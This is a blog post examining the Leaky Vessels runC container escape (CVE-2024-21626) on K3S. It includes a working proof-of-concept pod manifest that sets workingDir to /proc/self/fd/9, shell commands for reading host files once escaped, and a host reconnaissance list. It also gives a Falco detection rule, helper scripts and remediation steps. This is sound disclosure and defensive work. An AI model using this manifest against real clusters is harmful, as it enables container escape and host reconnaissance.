Quest to Cloud Native Computing

Discussion about the Leaky Vessels security vulnerability on K3S


Modified: Fri, 2024-Feb-09


Recently, a container security vulnerability called Leaky Vessels was disclosed that could lead to container escape. With this vulnerability, processes running inside a container may gain access to files on the host system. Leaky Vessels covers several related CVEs affecting runC, Docker and BuildKit (CVE-2024-21626, CVE-2024-23651, CVE-2024-23652 and CVE-2024-23653). This article focuses on CVE-2024-21626, which affects the runC container runtime.

This vulnerability is caused by a file descriptor leak in the runC container runtime. Under specific conditions, or with a crafted exploit, attackers can leverage it to gain read access to the host file system or even overwrite files on it (I think this may depend on whether the container runs as root).
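To make the term "file descriptor leak" more concrete: on Linux, every process exposes its open descriptors under /proc/self/fd, and each entry can be followed like a symbolic link. The sketch below is not part of the original test; it only lists the descriptors of the current process, and the function name `list_open_fds` is a hypothetical helper. In the vulnerable case, one of these entries refers to a directory on the host rather than one inside the container.

```python
import os


def list_open_fds(proc_fd_dir="/proc/self/fd"):
    """Map each open file descriptor number to the target it points at."""
    fds = {}
    try:
        entries = os.listdir(proc_fd_dir)
    except OSError:
        # procfs is not available (for example on a non-Linux system)
        return fds
    for name in entries:
        try:
            fds[int(name)] = os.readlink(os.path.join(proc_fd_dir, name))
        except (OSError, ValueError):
            # The descriptor was closed in the meantime, or the entry is not numeric
            continue
    return fds


if __name__ == "__main__":
    for fd, target in sorted(list_open_fds().items()):
        print(fd, "->", target)
```

Running this inside a container shows which descriptors the process inherited; anything pointing outside the container's own file system would deserve a closer look.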

When I heard about this vulnerability, most articles demonstrated how to exploit it on Docker systems (by creating and running a malicious container image). I tried another method to see whether the vulnerability also works on K3S. This is the first time I have seen a container escape vulnerability in real life.

Unpatched versions of K3S are affected

K3S uses containerd, which uses the runC runtime. Instead of creating a malicious container image, I set 'workingDir' in a pod definition to override the working directory. Below is an example:

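apiVersion: v1
kind: Pod
metadata:
  name: leaky-vessels
spec:
  containers:
    - name: leaky-vessels
      # placeholder: the image line is missing from this listing;
      # any image that ships /bin/sh should do
      image: busybox
      # Override the working directory with a procfs file descriptor path
      workingDir: /proc/self/fd/9
      command: ["/bin/sh", "-c", "sleep infinity"]
      securityContext:
        privileged: false
        allowPrivilegeEscalation: false
        capabilities:
          drop:
            - ALL
        runAsNonRoot: true
        runAsUser: 1000000000
        runAsGroup: 1000000000
        seccompProfile:
          type: RuntimeDefault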

Here, several security measures are enabled for the container. It is not allowed to run as root or to escalate privileges, it drops all Linux capabilities, and it sets a seccomp profile. None of these measures prevents the Leaky Vessels attack on a vulnerable system.

Note that we did not create a malicious container image and then trick the owner into running it. We simply overrode the working directory of the pod to '/proc/self/fd/9'. Depending on the runC version, the working directory reportedly needs to be set to '/proc/self/fd/n', where n is between 1 and 10.
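Because the attack here only needs a pod definition, a simple pre-deployment check can flag manifests whose working directory points at a procfs file descriptor. The following is a minimal sketch under assumptions: the pod is already parsed into a Python dictionary (for example from YAML or from the JSON output of kubectl), and the function name `suspicious_working_dirs` and the regular expression are my own illustration, not an official check.

```python
import re

# Matches /proc/self/fd/<n> and /proc/<pid>/fd/<n>, optionally followed by a sub-path
_PROC_FD = re.compile(r"^/proc/(self|\d+)/fd/\d+(/|$)")


def suspicious_working_dirs(pod):
    """Return (container name, workingDir) pairs that point at a procfs fd."""
    spec = pod.get("spec", {})
    hits = []
    for key in ("initContainers", "containers", "ephemeralContainers"):
        for container in spec.get(key) or []:
            working_dir = container.get("workingDir", "")
            if working_dir and _PROC_FD.match(working_dir):
                hits.append((container.get("name", "?"), working_dir))
    return hits


if __name__ == "__main__":
    pod = {
        "spec": {
            "containers": [
                {"name": "leaky-vessels", "workingDir": "/proc/self/fd/9"},
                {"name": "sidecar", "workingDir": "/app"},
            ]
        }
    }
    print(suspicious_working_dirs(pod))
```

A check like this only covers the pod-definition route described here; it does not inspect the WORKDIR baked into a container image.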

Once the pod is running, we open a shell inside it:

        $ kubectl exec -it pod/leaky-vessels -- /bin/sh

        $ pwd

        # This is container escaping
        # We now have read access to the files on the host of the K3S system

        $ cd ../../../etc
        $ ls -l hostname
        -rw-r--r--    1 root     root            17 Nov 11  2019 hostname

        $ cat hostname

Voila! There we have it. Once attackers have escaped the container, they can do a lot even without write access. An attacker could:

  • Read any file that is readable by 'others' (world-readable), including but not limited to:

    • Get the current hostname of the host server

    • Get the OS and Linux distribution of the host server (etc/redhat-release)

    • Get the DNS resolver of the host server

    • Access the RPM database of the host server (e.g. strings rpmdb.sqlite | grep src.rpm | sort)

      • The attackers would then know which packages are installed on the host

    • Access proc/net/route, so the attackers would know the default gateway of the host

    • Access proc/version, so the attackers would know the kernel version and architecture of the host

    • Access proc/PID/stat, so the attackers would know some of the PIDs and process names running on the host. For example:

              ls -1 */stat |  xargs awk '{print $1 " " $2}' | sort -n -k 1
              # These are PIDs and the process name
              33907 (nginx)
              33908 (nginx)
              33909 (nginx)
              33910 (nginx)
              33911 (nginx)

      Many of the process names of the host system are exposed.
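To illustrate how much a single world-readable file gives away, here is a small sketch that decodes the default gateway from the kernel routing table in procfs (/proc/net/route on a typical Linux host). The table stores addresses as hexadecimal numbers in host byte order; the sketch assumes a little-endian host. The sample table and the function name `default_gateways` are made up for illustration and are not taken from my test system.

```python
import socket
import struct

RTF_GATEWAY = 0x2  # route flag: this entry goes through a gateway


def default_gateways(route_text):
    """Return (interface, gateway IP) for each default route in the table."""
    result = []
    for line in route_text.splitlines()[1:]:  # skip the header row
        fields = line.split()
        if len(fields) < 4:
            continue
        iface, dest, gateway = fields[0], fields[1], fields[2]
        flags = int(fields[3], 16)
        if dest == "00000000" and flags & RTF_GATEWAY:
            # Hex value in host byte order; little-endian is assumed here
            ip = socket.inet_ntoa(struct.pack("<L", int(gateway, 16)))
            result.append((iface, ip))
    return result


# Hypothetical sample in the layout of /proc/net/route
SAMPLE = (
    "Iface\tDestination\tGateway\tFlags\tRefCnt\tUse\tMetric\tMask\tMTU\tWindow\tIRTT\n"
    "eth0\t00000000\t0101A8C0\t0003\t0\t0\t100\t00000000\t0\t0\t0\n"
    "eth0\t0001A8C0\t00000000\t0001\t0\t0\t100\t00FFFFFF\t0\t0\t0\n"
)

if __name__ == "__main__":
    print(default_gateways(SAMPLE))
```

The same idea applies to the other files in the list: none of them needs write access or elevated privileges to be useful for reconnaissance.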

Below is a demonstration of the Leaky Vessels attack.

Detecting the Leaky Vessels vulnerability

Snyk has released some eBPF (static and dynamic) detectors.

However, these detectors seem to be designed for runC (Docker based) systems. They did not work for K3S in my testing.

We can use Falco to detect attempts to exploit the vulnerability.

Here is the Falco rule (/etc/falco/rules.d/leaky-vessels.yaml) I used for this case:

- rule: Possible container escape attempt - Leaky Vessels
  desc: >
    Detecting a container process that changes the current directory using a procfs file descriptor.
  condition: >
    ( container
    and evt.type = chdir
    and evt.dir = <
    and evt.rawres in (0, 1, 2)
    and evt.arg.path startswith "/proc/self/fd/" )
  output: >
    - Event time [%evt.datetime]
    - Possible container escape attempt detected.
    - Details
    evt.res=%evt.res proc.cwd=%proc.cwd
    proc.cmdline=%proc.cmdline proc.exepath=%proc.exepath
    proc.ppid=%proc.ppid proc.pcmdline=%proc.pcmdline
    user.loginuid=%user.loginuid user.loginname=%user.loginname
  priority: WARNING
  tags: [host, container, cve-2024-21626]

The entry below is written to syslog as a single line. I split it into multiple lines to make it easier to read.

        Feb  7 09:22:09 k3s-controller falco[1157671]: 09:22:09.819887134:
Warning - Event time [2024-02-07 09:22:09.819887134]
- Possible container escape attempt detected.
- Details evt.type=chdir evt.args=res=0 path=/proc/self/fd/9
proc.cwd=/proc/self/fd/9/ proc.cmdline=runc:[1:CHILD] init
proc.sid=99 proc.ppid=1158164
proc.pcmdline=runc --root /run/containerd/runc/ --log /run/k3s/containerd/io.containerd.runtime.v2.task/ --log-format json exec --process /tmp/runc-process1490844986 --console-socket /tmp/pty3871979753/pty.sock --detach --pid-file /run/k3s/containerd/io.containerd.runtime.v2.task/ babba8c496a041fcc8ba8227f4aca026674d2ba30b5d52d19a0fff86e476304b
user.uid=0 user.loginuid=-1 user.loginname=<NA>
container.privileged=<NA><NA> container.image=<NA><NA> container_location=<NA>:<NA>
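When many such alerts arrive, it can help to pull the descriptor number out of each syslog line, for example to see which values of n are being probed. The sketch below assumes the alert contains a `path=/proc/self/fd/<n>` fragment as in the log above; the function name `leaked_fd_from_alert` is hypothetical.

```python
import re

# Looks for the chdir target reported in the alert, e.g. path=/proc/self/fd/9
_CHDIR_PATH = re.compile(r"\bpath=/proc/self/fd/(\d+)")


def leaked_fd_from_alert(line):
    """Return the file descriptor number named in a Falco alert, or None."""
    match = _CHDIR_PATH.search(line)
    return int(match.group(1)) if match else None


if __name__ == "__main__":
    alert = "- Details evt.type=chdir evt.args=res=0 path=/proc/self/fd/9"
    print(leaked_fd_from_alert(alert))
```

This only reads the text of an alert; it is not a replacement for the Falco rule itself.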

Remediation and prevention

  • Check with your vendors and upgrade vulnerable systems to a patched version (e.g., runc, Docker, BuildKit, containerd, K3S, OpenShift, cloud service providers, etc.)

  • According to articles I have read, Red Hat recommends configuring SELinux in enforcing mode so that these suspicious activities can be blocked

  • Container sandboxing with Google gVisor and Kata Containers. I tried the same method (setting 'workingDir') with an older version of Google gVisor and with Kata Containers on an unpatched K3S. The 'workingDir' method does not work under container sandboxing. These sandboxing techniques provide an isolated environment and reduce the attack surface.

    • Result with Google gVisor

              $ kubectl describe pod/leaky-vessels
              Name:         leaky-vessels
                  Container ID:  containerd://d9331918bb000afb1000f3065e72295a92abdd70b885c53de404f9025ad6c20a
                    sleep infinity
                  State:          Waiting
                    Reason:       CrashLoopBackOff
                  Last State:     Terminated
                    Reason:       StartError
                    Message:      failed to start containerd task "d9331918bb000afb1000f3065e72295a92abdd70b885c53de404f9025ad6c20a": OCI runtime start failed: starting container: starting sub-container [/bin/sh -c sleep infinity]: creating process: failed to find initial working directory "/proc/self/fd/9": invalid argument: unknown
                    Exit Code:    128
                  Ready:          False

    • Result with Kata Containers

              Name:         leaky-vessels
                  Container ID:  containerd://b03df3a00fd9856d5f36bac3f346aba8451bd7814e8538d691da58d851c5b650
                  Port:          <none>
                  Host Port:     <none>
                    sleep infinity
                  State:          Waiting
                    Reason:       RunContainerError
                  Last State:     Terminated
                    Reason:       StartError
                    Message:      failed to create containerd task: failed to create shim task: No such file or directory (os error 2): unknown
                    Exit Code:    128
                  Ready:          False
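For the first item in the list above (upgrading), a quick way to triage hosts is to compare the reported runC version against the first fixed release, which is 1.1.12 according to the upstream advisory for CVE-2024-21626. The sketch below is only a rough helper under assumptions: it treats every version below 1.1.12 as needing an upgrade, it ignores pre-release suffixes and vendor backports, and the function name `needs_upgrade` is hypothetical. K3S bundles its own runC, so the K3S release notes remain the authoritative source.

```python
import re

PATCHED = (1, 1, 12)  # first runC release with the fix, per the upstream advisory


def needs_upgrade(version_text):
    """Return True if the first x.y.z version found is older than PATCHED."""
    match = re.search(r"(\d+)\.(\d+)\.(\d+)", version_text)
    if not match:
        raise ValueError("no x.y.z version found in: %r" % version_text)
    version = tuple(int(part) for part in match.groups())
    return version < PATCHED


if __name__ == "__main__":
    # Strings in the style of `runc --version` output
    for text in ("runc version 1.1.10", "runc version 1.1.12"):
        print(text, "->", "upgrade" if needs_upgrade(text) else "ok")
```

Distribution packages sometimes backport fixes without changing the upstream version number, so a "needs upgrade" result should be confirmed against the vendor's advisory.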
